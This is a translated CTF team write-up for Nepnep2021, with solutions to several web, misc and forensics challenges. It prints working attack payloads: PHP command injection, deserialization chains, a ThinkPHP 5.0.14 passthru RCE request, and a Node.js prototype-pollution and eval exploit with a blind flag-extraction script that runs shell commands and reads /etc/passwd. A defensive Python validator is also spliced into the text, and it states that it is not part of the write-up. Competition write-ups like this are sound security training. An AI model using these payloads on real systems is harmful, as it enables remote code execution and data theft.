Nepnep2021

Team name

Y4摸鱼来玩

Ranked 4th

web

little_trick

Method 1

Seeing a restriction list that long, the immediate thought is that PHP backticks execute commands; combined with read/write permission on the files, that is enough to solve it.

```
http://ea2e7981-2ed4-463d-a132-f90cf546479d.node1.hackingfor.fun/1b5337d0c8ad813197b506146d8d503d/?nep=`cat n*>1`;&len=99
```

Then visit

```
http://ea2e7981-2ed4-463d-a132-f90cf546479d.node1.hackingfor.fun/1b5337d0c8ad813197b506146d8d503d/1
```

Method 2

Plus a small trick: since the names are all letters, and a Linux directory listing sorts digits first and then letters in abcd... order

we run

```
`>cat`
```

after which the directory listing should look like this

```
cat nepxxx.php  indxx,php
```

Combined with the asterisk trick,

```
`*>1`
```

is equivalent to `cat nepxxx.php  indxx,php >1`, which yields the flag.

bbxhh_revenge

Unintended solution

Noticing it bans IPs, I just spent ten yuan on a proxy; I'm so bad, hehe. Sending imagin first told me to go on and send nepnep, and after that to POST HuaiNvRenPaPaPa.

In the end the flag turned out to be right inside phpinfo.

```
http://node4.hackingfor.fun:32320/index.php?nepnep=phpinfo();&imagin=system("ls");
post
HuaiNvRenPaPaPa=1
```

After the contest ended it seems the challenge was changed, hhh, so that counts as a free flag for me.

Intended solution (not solved yet)

While writing this up I found it seems to have been patched; haven't figured it out yet, moving on to other challenges first.

easy_tomcat (not solved)

A few small ideas found along the way

Found login and registration functionality; tried directory traversal at the avatar upload and failed; by guessing, found three routes: index.jsp, register.jsp, admin.jsp

Tried the classic Tomcat vulnerability

http://500c7619-aa62-4b0d-90a8-6ad219cc014d.node5.hackingfor.fun/examples/servlets/servlet/SessionExample

Found it was useless, hehe

Solved it later, see my CSDN

梦里花开牡丹亭

The challenge hands you the source code as soon as you open it, so a quick analysis first.

First the Game class, which has __wakeup and __destruct methods; inside is 21232f297a57a5a743894a0e4a801fc3, which an online lookup resolves to admin.

A quick analysis makes it clear that the intended path is shell($content); to run arbitrary commands, but because waf.txt exists only file_get_contents gets called, so first read shell.php:

```php
<?php
class Game{
    public $username;
    public $password;
    public $choice;
    public $register;
    public $file;
    public $filename;
    public $content;
    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->filename='shell';
        $this->content='phpinfo();';
        $this->register = 'admin';
        $this->file=new Open();
    }

}
class Open{

}
class login{
    public $file;
    public $filename;
    public $content;

    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }

}

$a = new Game();
echo base64_encode(serialize($a));
```

To delete waf.txt the only option is a PHP built-in class, so search for one with a method that can delete a file; blind guess that it is named open

```php
<?php
$classes = get_declared_classes();
foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            '__destruct',
            '__wakeup',
            '__call',
            '__callStatic',
            'open'
        ))) {
            print $class . '::' . $method . "\n";
        }
    }
}
```

This turns up ZipArchive, which fits exactly: ZipArchive::open() with flags 8 (ZipArchive::OVERWRITE) truncates waf.txt, which is as good as deleting it

```php
<?php
class Game{
    public $username;
    public $password;
    public $choice;
    public $register;

    public $file;
    public $filename;
    public $content;

    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->filename='waf.txt';
        $this->content=8;
        $this->register = 'admin';
        $this->file=new ZipArchive();
    }

}
class Open{

}
class login{
    public $file;
    public $filename;
    public $content;

    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }

}

$a = new Game();
echo base64_encode(serialize($a));
```

After that, arbitrary commands can be executed

```php
<?php
class Game{
    public $username;
    public $password;
    public $choice;
    public $register;

    public $file;
    public $filename;
    public $content;

    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->filename='shell';
        $this->content='ls /';
        $this->register = 'admin';
        $this->file=new Open();
    }

}
class Open{
    function open($filename, $content){
        if(!file_get_contents('waf.txt')){
            // shell($content);
        }else{
            echo file_get_contents($filename.".php");
        }
    }
}
class login{
    public $file;
    public $filename;
    public $content;

    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }

}

$a = new Game();
echo base64_encode(serialize($a));
```

Used `php /flag` to get past the filter, hhh

gamejs

The name immediately suggests Node.js; the usual trick of appending /source gets the source code, which shows three routes

```js
app.post('/record', record);
app.get('/', index);
app.get('/source', function (req, res)
```

Then I spotted a merge function at the very top, so there must be prototype pollution

The index page is the game itself, nothing to analyze there

The source page even less so

That leaves only the record route

```js
var score = req.body.score;
```

Data comes in via POST; to combine with prototype pollution it is sent as application/json, and since it is JSON, bypassing the next line becomes even easier

```js
score.length < String(highestScore).length
```

So we send the following and it is bypassed; an array would also bypass it, but that does not combine well with prototype pollution

```json
{"score": xxxx, "length": 1}
```

Now the next line; set it aside for the moment

```js
merge(record, {
    lastScore:score,
    maxScore:Math.max(parseInt(score),record.maxScore),lastTime: new Date().toString()});
```

Further down, the guess is that the key function unserialize has to be reached, so this if must be bypassed; but the JSON object we send bypasses it by itself, because the subtraction gives NaN and the check falls through, hhh

```js
if ((score - highestScore) < 0) {
    var banner = "不好,没有精神!";
} else {
    var banner = unserialize(serialize_banner).banner;
}
```

Looking at the unserialize function, there is an eval here that allows code execution

```js
if (validCode(func_code)){
    var d = '(' + func_code + ')';
    obj[key] = eval(d);
}
```

Tracing validCode shows it only filters the literal keywords, which hex escapes get around

```js
var validCode = function (func_code){
    let validInput = /subprocess|mainModule|from|buffer|process|child_process|main|require|exec|this|eval|while|for|function|hex|char|base64|"|'|\[|\+|\*/ig;
    return !validInput.test(func_code);
};
var validInput = function (input) {
    let validInput = /subprocess|mainModule|from|process|child_process|main|require|exec|this|function|buffer/ig;
    ins = serialize(input);
    return !validInput.test(ins);
};
```

So construct something like this; a quick analysis shows two nested __proto__ levels are needed

```json
{"score": {"__proto__": {"__proto__": {"jrxnm": "_$$ND_FUNC$$XXXPAYLAOD"}}, "length": 1}}
```
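A defender-side counterpart to the record handler discussed above, added here as an example (not code from the challenge or from this writeup): a Python model of the input checks that would stop both tricks, the nested __proto__ keys and the score-as-object-with-length. The names find_polluting_keys, validate_record_body and safe_merge and the sample bodies are constructed for this example; safe_merge only models the JavaScript fix, since Python dicts have no prototype chain.

```python
import json

# Keys a recursive merge must never copy: assigning through them reaches Object.prototype in JavaScript.
DANGEROUS_KEYS = frozenset({"__proto__", "constructor", "prototype"})

# Constructed sample bodies for the /record handler (the polluting shape follows the writeup's
# payload; the innermost value is a placeholder, not a function string).
BENIGN_BODY = '{"score": 42}'
POLLUTING_BODY = '{"score": {"__proto__": {"__proto__": {"jrxnm": "placeholder"}}, "length": 1}}'


def find_polluting_keys(obj, path="$"):
    """Walk a decoded JSON document and return the paths of every dangerous key, at any depth."""
    hits = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            child = f"{path}.{key}"
            if key in DANGEROUS_KEYS:
                hits.append(child)
            hits.extend(find_polluting_keys(value, child))
    elif isinstance(obj, list):
        for idx, value in enumerate(obj):
            hits.extend(find_polluting_keys(value, f"{path}[{idx}]"))
    return hits


def validate_record_body(raw: str):
    """Checks the handler should run before merge(): a JSON object, no prototype keys anywhere,
    and a score that is a real integer (an object carrying its own 'length', a string or an
    array must not pass, and neither may anything that would make 'score - highestScore' NaN)."""
    try:
        body = json.loads(raw)
    except json.JSONDecodeError as exc:
        return False, f"invalid JSON: {exc.msg}"
    if not isinstance(body, dict):
        return False, "body must be a JSON object"
    polluting = find_polluting_keys(body)
    if polluting:
        return False, "prototype-polluting keys: " + ", ".join(polluting)
    score = body.get("score")
    if isinstance(score, bool) or not isinstance(score, int):
        return False, "score must be an integer"
    return True, "ok"


def safe_merge(target: dict, source: dict) -> dict:
    """Python model of a hardened recursive merge: dangerous keys are skipped and recursion only
    happens into plain dicts on both sides, so a nested '__proto__' object is never walked into."""
    for key, value in source.items():
        if key in DANGEROUS_KEYS:
            continue
        if isinstance(value, dict) and isinstance(target.get(key), dict):
            safe_merge(target[key], value)
        else:
            target[key] = value
    return target


if __name__ == "__main__":
    for body in (BENIGN_BODY, POLLUTING_BODY, '{"score": {"length": 1}}'):
        print(body, "->", validate_record_body(body))
```

The type check on score is what closes the `score.length` bypass: once score must be an integer, neither an object with a `length` property nor an array reaches the comparison, and the later `score - highestScore` can no longer be NaN.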

Since nothing is echoed back, an error-based approach combined with binary search is used to recover the flag

```python
a = '69662870726f636573732e6d61696e4d6f64756c652e726571756972652822667322292e7265616446696c6553796e6328222f6574632f70617373776422292e746f537472696e6728295b305d3e227a22297b7d656c73657b7468726f77204572726f7228297d'
res = ""
for i in range(0, len(a), 2):
    res += "\\\\x" + a[i:i+2]
print(res)
```

Will write this part up tomorrow when there is time

```python
import requests
import time
import string
import json

url = "http://467df204-a224-4b61-8ae6-48637aa91cee.node5.hackingfor.fun/record"


def deco(idx, c):
    p = ''.join(['\\x' + hex(ord(i))[2:] for i in
                 f'if(process.mainModule.require("child_process").execSync("cat /flag").toString()[{idx}]>"{c}"){{}}else{{throw Error()}}']);
    r = {"score": {"__proto__": {"__proto__": {"banner1": "_$$ND_FUNC$$_``.constructor.constructor(`" + p + "`)()"}},
                   "length": 1}}
    return r


flag = ''
for i in range(0, 1000):
    max = 127
    min = 32
    while max >= min:
        # print(str(max)+"-------"+str(min))
        mid = (max + min) // 2
        r = requests.post(url, json=deco(i, chr(mid)))
        if "broke" not in r.text:
            min = mid + 1
        else:
            max = mid
        if max == mid == min:
            flag += chr(mid)
            print(flag)
            break
    if '}' in flag[:-1]:
        exit()
```

faka_revenge

Got the attachment and found it is ThinkPHP; at first I thought it was about the admin backend or something, but online MD5 cracking failed

A global search for THINK_VERSION gives version 5.0.14; a version this old surely has a usable RCE

That makes it simple: system is disabled, calling phpinfo throws an error (annoying), shell_exec is out too, but passthru works

Payload

```
http://e6a43052-fdf4-48f0-85e9-0a6bf6e53aa7.node5.hackingfor.fun/?s=index
then POST the data
_method=__construct&filter[]=passthru&method=GET&get[]=cat /zhangsan*
```

Misc

Sign-in challenge

It opens with a pile of 0xffff; my eyes went numb and I was stuck for ages. Guessed it is a QR-code-style challenge: wherever there is an f, paint it black

```python
s='fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffff9fffffffffffffffffffffffffffffff5f0001ffffffffffffffffffffffe000407ffcffffffffffffffffffffff8fffffffff7fffffffffffffffffffff3fffffffff3ffffffffffffffffffffcffffffffffbffffffffffffffffffffdffffffffffbffffffffffffffffffffdffffffffffbfffffffffffffffffffffffffffffffdfffffffffffffffffffffffffffffffdfffffffffffffffffffffffffffffffdfffffffffffffffffffffffffffffffcfffffffffffffffffffffffffffffffffcffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000fffffffffffffffffffffffffffe7fff1f9fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe1fffffffffffdffffffffffffffffff8cfffffffffffdfffffffffffffff03fbf7ffffffffffbffffffffffffffe79f3f3ffffffffffbffffffffffffffefde7fbffffffffffbffffffffffffffefeeff9ffffffffffbffffffffffffffefe6ffdffffffffff9ffffffffffffffcff6ffdffffffffffcffffffffffffffdffaffcffffffffffe3fffffffffffffdff8ffefffffffffff800fffffffffffdff9ffefffffffffff0fffffffffffffdffdffeffffffffffc7fffffffffffffdffffff7fffffffff3ffffffffffffffdffffff7fffffffff7ffffffffffffffdffffff7ffffffffffffffffffffffffdfff9fffffffffffffff7fffffffffffffffbfffffffffffffff3fffffffffffffff7ffffffffffffc1fbfffffffffffffff7ffffffffffff9df9fffffffffffffff7ffffffffffffbdfdfffffffffffffff7ffffffffffffbdfdfffffffffffffff9ffffffffffffbdf9fffffffffffffffcffffffffffffbdfbfffffffffffffffe3fffffffffffbdfbfffffffffffffffc007fffffffffbdf3fffffffffffffff1f83fffffffff9df7ffffffffffffffe7ffffffffffffcdcfffffffffffffffefffffffffffffe01ffffffffffffffffffffffffffffffdfffffffffffffffffffffffffffffffdffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff3fffffffffffffffffffffffffffff3e7ffffffffffffffffffffffffffffc78ffffffffff8ffffffffffffffffffb03fffffffffff3fffffffffffffffff23ffffffffffff87ffffffffffffffff787ffffffffffff0ffffffffffffffff7f9ffffffffffffc7fffffffffffffff7fc7fffffffffff1ffffffffffffffff7ff3ffffffffffc7ffffffffffffffffbffbffffffffff1fffffffffffffffffcffbfffffffffcffffffffffffffffffe7e7ffffffffe1fffffffffffffffffff80fffffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe3fffffffffffffffffffffffffff01f89ffffffffffffffffffffffffffc7cf3cffffffffffffffffffffffffff9fee7efffffffffffffffffffbffffff3ff6fefffffffffffffffffffbffffff7ff2fe7ffffffffffffffffffbffffff7ffaff7ffffffffffffffffffbfffffefff8ff7ffffffffffffffffffbfffffefffcff7ffffffffffffffffffbfffffefffcff3ffffffffffffffffffbfffffefffcffbffffffffffffffffffbfffffeffffffbffffffffffffffffffbffffffffffffbffffffffffffffffffbffffffffffffbffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffc00fffffffffffffffffffffffbfffffbff00001ffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffffffffffffdfcfffffffffffffffffffffffffffffbfefffffffffffffffffffffffffffff3fe7ffffffffffffffffffffffffffff7ff7ffffffffffffffffffffffffffff7ff7ffffffffffffffffffffffffffff7ff7ffffffffffffffffe1ffffffffff7ff7ffffffffffffffff0fffffffffff7ff7fffffffffffffff8ffffffffffff7fefffffffffffffffff3fffffffffff9f0fffffffffffffffffcfffffffffffe07fffffffffffffffffe7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffff7ffffffffffffffffffffffffffffffe7fffffffffffffffffffffffffffffc0fffffffffffffffffffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7ffffffffff8001fffffffffffffffff7ffffffffffbffc00fffffffffffffff7ffffffffff7ffffe1ffffffffffffff7ffffffffff7fffffcffffffffffffff7ffffffffff7fffffe7fffffffffffff7ffffffffff3ffffff3fffffffffffff7ffffffffffbffffffbfffffffffffff7ffffffffff7ffffff3fffffffffffff7ffffffffff83ffffe7fffffffffffff7fffffffffff83fffcffffffffffffff7ffffffffffff80003ffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7ffffffffffbffffffffffffffffffff7ffffffffff9ffffffffffffffffffff7ffffffffffdffffffffffffffffffff7ffffffffffeffffffffffffffffffff7ffffffffffeffffffffffffffffffff7fffffffffff7fffffffffffffffffff7fffffffffff7fffffffffffffffffff7fffffffffffbfffffffffffffffffff7fffffffffff9fffffffffffffffffff7fffffffffffdfffffffffffffffffff7fffffffffffcfffffffffffffffffff7fffffffffffefffffffffffffffffff7fffffffffffe7ffffffffffffffffff7ffffffffffff3ffffffffffffffffff7ffffffffffffbfffffffffffffffffffffffffffffffbfffffffffffffffffffffffffffffff9f003fffffffffffffffffffffffffffc07f83ffffffffffffffffffffffffff9fffffffffff8000001fffffffffffff3fffffffffff3fffffcffffffffffffe7ffffffffffe7fffffe7fffffffffffcfffffffffffcfffffff3fffffffffff9fffffffffffc1ffffff3fffffffffff3fffffffffffe7fffffc7ffffffffffe7ffffffffffff03ffe01fffffffffffdffffffffffffff8000fffffffffffff3ffffffffffffffffffffffffffffffe7ffffffffffffffffffffffffffffff8fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffffffffffffffffffffffffffffefffffffffffffffffffffffffffffffefffffffffffffffffffffffffffffffefffffffffffffffffffffffffffffffefffe03ffffffffffffffffffffffffff7ffcf8fffffffffffbffffffffffffff7ff9fefffffffffff3ffffffffffffff7ff3ff7fffffffffe7ffffffffffffffbff7ffbfffffffffefffffffffffffffbff7ffbfffffffffefffffffffffffffbff7ffdfffffffffeffffffffcffffffbff7ffdfffffffffeffffffffeffffffbff7ffdfffffffffe7fffc0ffeffffffbff7ffcffffffffff3fff9e07effffffbff7ffeffffffffff80017ff80ffffffbff7ffefffffffffffffd7ffffffffff0037ffefffffffffffffc7ffffffffffffc3ffefffffffffffffefffffffffffffffffefffffffffffffefffffffffffffffffcfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe03fffffffffffffffffffffffffffffcf9fffffffffffffffffffffffffffff9fdffffffffffffffff7ffffffffffffbfdffffffffffffffff7ffffffffffffbfcffffffffffffffff7ffffffffffff3feffffffffffffffff7ffffffffffff7feffffffffffffffff7ffffffffffff7feffffffffffffffff7ffffffffffff000000007ffffffffff7ffffffffffffbffffffe7ffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffffffffffffffffffffffff7ffffffffffffffdffffffffffffffff7ffffffffffffffcffffffffffffffff7ffffffffffff07effffffffffffffff7ffffffffffff73effffffffffffffff7ffffffffffff7beffffffffffffffff7ffffffffffff7beffffffffffffffff7ffffffffffff7beffffffffffffffff7ffffffffffff9bcffffffffffffffff7ffffffffffffc3dffffffffffffffff7fffffffffffff01ffffffffffffffff7fffffffffffffffffffffffffffffff7fffffffffcfffffffffffffffffffff7fffffffffe1ffffffffffffffffffff7ffffffffffe0fffffffffffffffffff7fffffffffffe07fffffffffffffffff7fffffffffffff00ffffffffffffffff7ffffffffffffffeffffffffffffffff7ffffffffffffff8ffffffffffffffff7fffffffffffffe3ffffffffffffffff7fffffffffffff8ffffffffffffffffffffffffffffffe3fffffffffffffffffffffffffffffe1fffffffffffffffffffffffffffffc0fffffffffffffffffffffffffffffc1ffffffffffffffffffffffffffffffc7fffffffffffffffffffffffffffffff807fffffffffffffffffffffffffffffff01fffffffffffffffffffffffffffffffc07ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
strs = ''
for i in s:
    if i == 'f':
        strs += ' '
    else:
        strs += '█'
    if len(strs) >= 32:
        print(strs)
        strs = ''
```

Finally opened it in Notepad and stared at it so long I nearly went blind; got the flag, submitted it over and over and it was wrong, and it turned out that the part in the middle is not so but 50

出题人日记 (Challenge author's diary)

First look at the Excel file: select all and set the font to black, and at day 18 there is hidden text hinting rot13; moving the picture reveals a hint that the flag is inside. So open the Excel file as a zip and find a hint in the comment

隐写.wf pna fbyir guvf ceboyrz

Applying rot13 gives

6hAJqs.png

Tried the usual StegSolve first and found data in alpha channel bit planes 0, 1, 2, 3, but had no idea what to do with it, so went looking for 隐写.js

Googled 隐写.js and found nothing; searched in English instead and found

6hAssJ.png

The second result contains

6hAfJK.png

Open the corresponding online demo

http://www.peter-eigenschink.at/projects/steganographyjs/showcase/, drop the blue doll image in and get the flag

冰峰历险记

Got the exe and played it a bit; it asks for a flag in Nep{} format. Dragged it into IDA first and found nothing; later noticed a Developer Tools option under View, opened it, and it is Chrome's devtools... Looked at the source and found

64l6te.png

So just reverse it: the function simply returns _0x3771[input-0xa9]; the later operations on _0x3771 can be ignored. In the if check, \x7d is '}', so just print the string on the right-hand side of the assignment

```js
function onButtonClick () {

var _0x3771=['\x62\x6c\x65','\x72\x61\x74\x75','\x33\x39\x46\x32','\x31\x4c\x49\x4a\x76\x65\x68','\x32\x33\x6e\x79\x4f\x53\x75\x6d','\x31\x36\x4d\x42\x73\x69\x7a\x6d','\x34\x64\x4d\x50\x73\x48\x53','\x2d\x31\x44\x45','\x37\x33\x32\x39\x34\x56\x55\x4d\x52\x78\x52','\x34\x41\x45\x31','\x31\x31\x36\x31\x38\x38\x37\x55\x50\x47\x44\x6c\x68','\x33\x36\x30\x39','\x66\x6f\x6e\x74','\x38\x44\x43\x33','\x53\x69\x7a\x65','\x36\x44\x36\x2d','\x43\x6f\x6e\x67','\x32\x33\x6b\x63\x4d\x7a\x4b\x65','\x45\x35\x35\x38','\x31\x35\x36\x35\x32\x35\x64\x50\x66\x52\x45\x49','\x73\x74\x79\x6c','\x6c\x61\x74\x69','\x35\x63\x42\x4c\x49\x4e\x5a','\x35\x35\x37\x33\x39\x68\x72\x6d\x41\x73\x6c','\x4e\x65\x70\x7b','\x36\x38\x38\x35\x38\x68\x6e\x55\x50\x43\x74','\x31\x30\x39\x39\x36\x31\x68\x43\x6f\x45\x6e\x79','\x76\x69\x73\x69','\x6f\x6e\x73\x21','\x34\x36\x30\x35\x31\x46\x66\x61\x70\x4f\x49','\x74\x65\x78\x74'];var _0x336e=function(_0x8710fc,_0xbfc9ff){_0x8710fc=_0x8710fc-0xa9;var _0x377162=_0x3771[_0x8710fc];return _0x377162;};var _0x422051=_0x336e;(function(_0x5ea0a5,_0x23a2f6){var _0x4b1718=_0x336e;while(!![]){try{var _0x13718d=parseInt(_0x4b1718(0xb3))*-parseInt(_0x4b1718(0xbb))+-parseInt(_0x4b1718(0xb9))*parseInt(_0x4b1718(0xc4))+-parseInt(_0x4b1718(0xac))+-parseInt(_0x4b1718(0xc7))*-parseInt(_0x4b1718(0xbc))+parseInt(_0x4b1718(0xaa))*parseInt(_0x4b1718(0xc5))+parseInt(_0x4b1718(0xbf))*parseInt(_0x4b1718(0xc6))+parseInt(_0x4b1718(0xb5))*parseInt(_0x4b1718(0xb8));if(_0x13718d===_0x23a2f6)break;else _0x5ea0a5['push'](_0x5ea0a5['shift']());}catch(_0x2f82a9){_0x5ea0a5['push'](_0x5ea0a5['shift']());}}}(_0x3771,0xcdfa7));
console.log(_0x422051(0xba)+_0x422051(0xc3)+_0x422051(0xab)+_0x422051(0xa9)+'\x42\x2d\x34\x39'+'\x33\x31\x2d\x41'+_0x422051(0xb1)+_0x422051(0xad)+_0x422051(0xaf)+_0x422051(0xb4)+'\x7d')

}
onButtonClick()
```

我是间谍2nd

A bad woman secretly put a program on my USB drive; can you find out what she did? remember: try to forgery ip,but not to reverse it.

What I thought of at first was patching the program's IP to a public address; I was blind and just ignored the English. Afterwards, simply change the local machine's IP address and start an nc listener, then press Enter manually to get the flag, hhhh

Got Nep{XVlBzgbaiCMRAjWwhTHctcuAxhxKQFDaFpLSjFbcXoEF}

我没有py

volatility imageinfo shows it is Win7, so

```
> volatility -f WIN-MREMF575OV9-20210317-081823.raw --profile=Win7SP1x64 pstree
Volatility Foundation Volatility Framework 2.6
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0xfffffa800418eb30:WeChat.exe 2468 2828 0 ------ 2021-03-17 07:48:18 UTC+0000
. 0xfffffa8001cec060:WeChat.exe 1152 2468 44 825 2021-03-17 08:10:24 UTC+0000
.. 0xfffffa8001eb8320:wechatweb.exe 3036 1152 6 165 2021-03-17 08:10:24 UTC+0000
.. 0xfffffa8003bf7060:WeChatApp.exe 2224 1152 49 568 2021-03-17 08:11:37 UTC+0000
0xfffffa80018cd630:wininit.exe 404 340 3 76 2021-03-17 06:50:12 UTC+0000
. 0xfffffa8003a01910:services.exe 476 404 9 217 2021-03-17 06:50:12 UTC+0000
.. 0xfffffa800210a810:svchost.exe 1452 476 4 69 2021-03-17 07:27:29 UTC+0000
.. 0xfffffa8003e8c060:vmtoolsd.exe 1496 476 11 271 2021-03-17 06:50:14 UTC+0000
.. 0xfffffa8003fb78f0:msdtc.exe 664 476 12 147 2021-03-17 06:50:19 UTC+0000
.. 0xfffffa8003b5d740:svchost.exe 772 476 19 500 2021-03-17 06:50:13 UTC+0000
... 0xfffffa8001ce13b0:audiodg.exe 2148 772 5 136 2021-03-17 07:57:49 UTC+0000
.. 0xfffffa8003cae320:spoolsv.exe 1060 476 12 262 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003bc3b30:svchost.exe 936 476 38 1022 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003cf8200:svchost.exe 1116 476 18 318 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003c1bb30:svchost.exe 304 476 15 472 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa800196f250:sppsvc.exe 2696 476 4 152 2021-03-17 06:52:16 UTC+0000
.. 0xfffffa8003b25060:vm3dservice.ex 696 476 3 44 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003d8ab30:taskhost.exe 1216 476 9 210 2021-03-17 06:50:14 UTC+0000
.. 0xfffffa8003e656b0:svchost.exe 2400 476 13 221 2021-03-17 06:51:15 UTC+0000
.. 0xfffffa8001cafb30:PresentationFo 3012 476 6 153 2021-03-17 07:10:18 UTC+0000
.. 0xfffffa8003c18b30:svchost.exe 204 476 26 564 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003b3a740:svchost.exe 720 476 8 288 2021-03-17 06:50:13 UTC+0000
.. 0xfffffa8003aaeb30:svchost.exe 632 476 11 366 2021-03-17 06:50:13 UTC+0000
... 0xfffffa8003b8e270:WmiPrvSE.exe 1212 632 10 211 2021-03-17 06:50:16 UTC+0000
.. 0xfffffa8003de9b30:VGAuthService. 1368 476 3 82 2021-03-17 06:50:14 UTC+0000
.. 0xfffffa8003f778e0:SearchIndexer. 2212 476 13 713 2021-03-17 06:50:20 UTC+0000
.. 0xfffffa8001ed4060:svchost.exe 1980 476 13 320 2021-03-17 07:46:53 UTC+0000
.. 0xfffffa8003bbf890:svchost.exe 880 476 13 314 2021-03-17 06:50:13 UTC+0000
... 0xfffffa8003e0b3c0:dwm.exe 1400 880 3 72 2021-03-17 06:50:14 UTC+0000
.. 0xfffffa8004041b30:svchost.exe 1908 476 6 91 2021-03-17 06:50:16 UTC+0000
.. 0xfffffa800413b2f0:vds.exe 2812 476 13 142 2021-03-17 07:26:53 UTC+0000
. 0xfffffa8003a095a0:lsass.exe 484 404 7 595 2021-03-17 06:50:12 UTC+0000
. 0xfffffa8003a0d5f0:lsm.exe 492 404 10 154 2021-03-17 06:50:12 UTC+0000
0xfffffa8003783060:csrss.exe 352 340 9 460 2021-03-17 06:50:12 UTC+0000
0xfffffa80018bab30:System 4 0 93 598 2021-03-17 06:50:10 UTC+0000
. 0xfffffa8002c899f0:smss.exe 264 4 2 29 2021-03-17 06:50:10 UTC+0000
0xfffffa800367b910:csrss.exe 412 396 10 447 2021-03-17 06:50:12 UTC+0000
. 0xfffffa8002d79ad0:conhost.exe 2476 412 2 60 2021-03-17 08:18:23 UTC+0000
0xfffffa8003a10060:winlogon.exe 504 396 5 116 2021-03-17 06:50:12 UTC+0000
0xfffffa8003e292d0:explorer.exe 1428 1336 38 1156 2021-03-17 06:50:14 UTC+0000
. 0xfffffa8003ee2b30:vmtoolsd.exe 1584 1428 9 250 2021-03-17 06:50:15 UTC+0000
. 0xfffffa8001ab1660:mmc.exe 1836 1428 7 347 2021-03-17 07:26:52 UTC+0000
. 0xfffffa8002a1bb30:DumpIt.exe 2932 1428 2 45 2021-03-17 08:18:23 UTC+0000
. 0xfffffa8001ec2060:VeraCrypt.exe 2260 1428 5 376 2021-03-17 07:16:39 UTC+0000
. 0xfffffa8003e69b30:vm3dservice.ex 1576 1428 2 53 2021-03-17 06:50:15 UTC+0000
